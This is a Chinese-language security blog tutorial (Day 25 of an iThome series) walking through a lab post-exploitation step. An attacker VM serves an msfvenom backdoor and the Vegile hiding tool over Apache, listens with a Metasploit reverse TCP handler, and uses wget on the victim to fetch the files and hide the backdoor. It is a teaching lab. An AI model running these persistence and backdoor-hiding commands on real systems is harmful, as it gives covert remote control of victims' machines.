iT邦幫忙

2021 iThome 鐵人賽

DAY 25
1
Security

資安由淺入深系列 第 25

【Day25】維持權限 — 隱藏後門(二)

  • 分享至 

  • xImage
  •  

哈囉~
昨天我們用msfvenom建立了一個後門,
將其傳送到受害端的主機,
只要受害端運行了該程式,
就會建立TCP連線,並自動連回我們的主機。
我們便可以透過連線來控制目標。
另外,也透過git clone把Vegile下載到電腦。

今天就來接續昨天的實作吧~/images/emoticon/emoticon37.gif

環境:
Kali ─ 攻擊方(192.168.168.131)
Parrot ─ 受害方(192.168.168.129)

攻擊端準備

  1. 將昨天的 後門 & Vegile 都移至/var/ww/html目錄下。

     cp backdoor /var/www/html
     cp -r Vegile /var/www/html
    


    為了模擬從受害端連回去server下載工具,記得要啟動apache

    systemctl start apache2
    

  2. 接下來我們執行msf控制台,使用exploit/multi/handler開始監聽

    msfconsole
    use exploit/multi/handler
    set payload linux/x64/shell/reverse_tcp
    set lhost [要連回的攻擊者ip]
    set lport 777
    run
    

取得受害端權限後

  1. 當我們已進入目標系統,可使用wget來下載我們step.1放到/var/www/html上的檔案。
    wget [攻擊者ip]/Vegile
    wget [攻擊者ip]/backdoor
    


  2. 之後執行Vegile --i backdoor時發現有錯誤...

    因為要隱藏的後門檔案,需放置在Vegile目錄下...
    於是我用cp直接複製過去...(๑¯∀¯๑)
  3. 讓我們再次確認Vegile & backdoor有在同個目錄~
  4. 使用chmod,將檔案改為可執行檔。
    chmod +x Vegile
    chmod +x backdoor
    
  5. 透過Vegile來隱藏後門檔案
    ./Vegile --i backdoor
    
  6. 回到我們攻擊者的電腦,可以看到有來自受害端的連線,表示攻擊成功

小結

Vegile這個工具的指令其實很簡單,
只有以下三個參數:

參數 說明
-i 隱藏後門
-u 開啟無限Session
-h 功能查詢

走囉! 高歌離席~/images/emoticon/emoticon29.gif


上一篇
【Day24】維持權限 — 隱藏後門(一)
下一篇
【Day26】檢測隱寫術/Rootkit的工具
系列文
資安由淺入深30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言